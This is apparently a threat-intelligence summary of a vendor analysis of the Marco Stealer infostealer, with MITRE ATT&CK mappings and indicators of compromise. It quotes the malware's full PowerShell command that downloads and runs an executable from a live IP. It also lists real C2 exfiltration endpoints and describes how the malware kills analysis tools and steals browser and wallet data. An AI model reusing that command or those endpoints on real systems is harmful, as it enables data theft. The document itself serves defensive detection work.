Technical Analysis of Marco Stealer

Zscaler ThreatLabz discovered Marco Stealer in June 2025, an information stealer that primarily exfiltrates browser data, cryptocurrency wallet data from extensions, and sensitive files from local and cloud storage. The malware uses ARX-based runtime string decryption, anti-analysis checks that terminate tools like x64dbg and Wireshark, named pipes and DLL injection to extract browser and wallet data, and sends AES-256–encrypted data to HTTP C2 endpoints. #MarcoStealer #Zscaler

Keypoints

Discovered in June 2025, Marco Stealer targets browser data, cryptocurrency wallet information stored in extensions, and sensitive files from local and cloud services.
The malware employs ARX-style string encryption (decrypted at runtime) and uses Windows APIs to detect and terminate anti-analysis/security tools like x64dbg, Wireshark, and Process Hacker.
Marco Stealer builds a detailed machine profile (hardware ID, OS version, IP address, geolocation) and verifies internet connectivity before proceeding; it self-deletes if offline.
Two browser-exfiltration methods are used: chromeDecryptor.dll (extracts Chrome AppBound key) via DLL injection, and needMe.exe communicating over a named pipe (.pipeFirefoxBrowserExtractor) to harvest browser SQLite data.
The stealer searches common user and cloud directories, captures clipboard and screenshots, and targets many services and apps (Discord, Telegram, VPNs, password managers, Steam, Outlook) for data extraction.
Stolen data is encrypted with AES-256 CBC (key derived from a hardcoded value via SHA-256 + CryptDeriveKey) and exfiltrated via HTTP POST to predefined C2 endpoints.
Zscaler Cloud Sandbox detects the campaign (threat names Win64.Downloader.Marco and Win64.PWS.Marco) and published multiple IOCs including download URLs, C2 IPs, file hashes, and dropped filenames.

MITRE Techniques

[T1047 ] Windows Management Instrumentation – Used to enumerate antivirus products and gather security product information via WMI and COM interactions (‘Marco Stealer performs Component Object Model (COM) interactions using DllCanUnloadNow and runs a Windows Management Instrumentation (WMI) query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products’)
[T1016 ] System Network Configuration Discovery – Used to obtain the victim’s external IP and country code by querying public IP/geolocation services (‘Marco Stealer queries services like https://ipinfo.io/ip and https://ipinfo.io/country to retrieve the external IP address and country code’)
[T1071 ] Application Layer Protocol – Uses HTTP for command-and-control and data exfiltration to blend with application-layer traffic (‘the encrypted data … is then sent to the predefined C2 endpoint (e.g., http://45.74.19[.]20:49259/receive) via an HTTP POST request with HTTP User-Agent field set to DataSender’)
[T1059 ] Command and Scripting Interpreter – Abuses PowerShell to download and execute the next-stage payload via a generated command (‘powershell.exe -ExecutionPolicy ByPass -Command “$client = New-Object System.Net.WebClient; $client.Headers.Add(‘X-Custom-Auth’, …); $client.DownloadFile(‘http://217.156.50.228:8181/…/PNcWncSY.exe’, ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe’); Start-Process ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe’”‘)
[T1057 ] Process Discovery – Enumerates running processes and retrieves executable paths/metadata to identify and terminate analysis tools and targeted browsers (‘Marco Stealer enumerates running processes and retrieves their executable file paths’ and ‘If any of the metadata collected matches the name of a common anti-analysis tool such as x64dbg, Wireshark, Process Hacker, or OllyDbg, Marco Stealer terminates the corresponding process’)
[T1105 ] Ingress Tool Transfer – Downloads binaries from remote URLs and extracts embedded resources to disk for execution (e.g., downloader fetching the main executable and extracting chromeDecryptor.dll/needMe.exe from resources) (‘the WebClient object downloads the Marco Stealer executable file from the URL http://217.156.50.228:8181/…/PNcWncSY.exe to the temporary path … and executes it’)
[T1082 ] System Information Discovery – Collects system and hardware details (machine GUID, OS version, RAM, CPU, GPU, installed software) to build an infection profile (‘Marco Stealer builds a profile of the victim’s machine by collecting system information such as hardware ID and operating system version, as well as the victim’s IP address and geographical location’)
[T1573 ] Encrypted Channel – Protects stolen data using AES-256 CBC encryption with a key derived from a hardcoded value to conceal exfiltrated content (‘Marco Stealer uses AES-256 CBC encryption … generates a SHA-256 hash of a hardcoded value … used to derive an AES-256 encryption key via the CryptDeriveKey function’)
[T1518.001 ] Security Software Discovery – Scans Windows Security Center registry paths and runs queries to enumerate installed AV/EDR products and other security tools for evasion/termination (‘Marco Stealer looks for antivirus software by scanning the Windows Security Center registry path (ROOTSecurityCenter2) … runs a WMI query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products’)

Indicators of Compromise

[URL / Downloading URL ] downloader URL – http://217.156.50.228:8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe, http://217.156.50.228:8185/LoqnOOuuIsTIYfkrdsfL/eUelHAyY.exe
[C2 Server Endpoint ] command-and-control – http://45.74.19.20:49259/receive, http://107.189.25.189:49259/receive
[File Hashes ] malware/binary hashes – 34deb6594098545d7ffb98844f0790bf, 3a3e8f6bc70748a39ffc047b3c86a665, and 7 other hashes listed in the report
[File Names / Dropped Files ] payload and resource filenames – chromeDecryptor.dll, needMe.exe (also observed dropped temp filename FILhFvaZ.exe)
[PDB Path ] developer build information – C:UsersmarcoDesktopBuilderBuilderClientClientx64ReleaseClient.pdb
[Mutex ] runtime artifact – GlobalItsMeRavenOnYourMachineed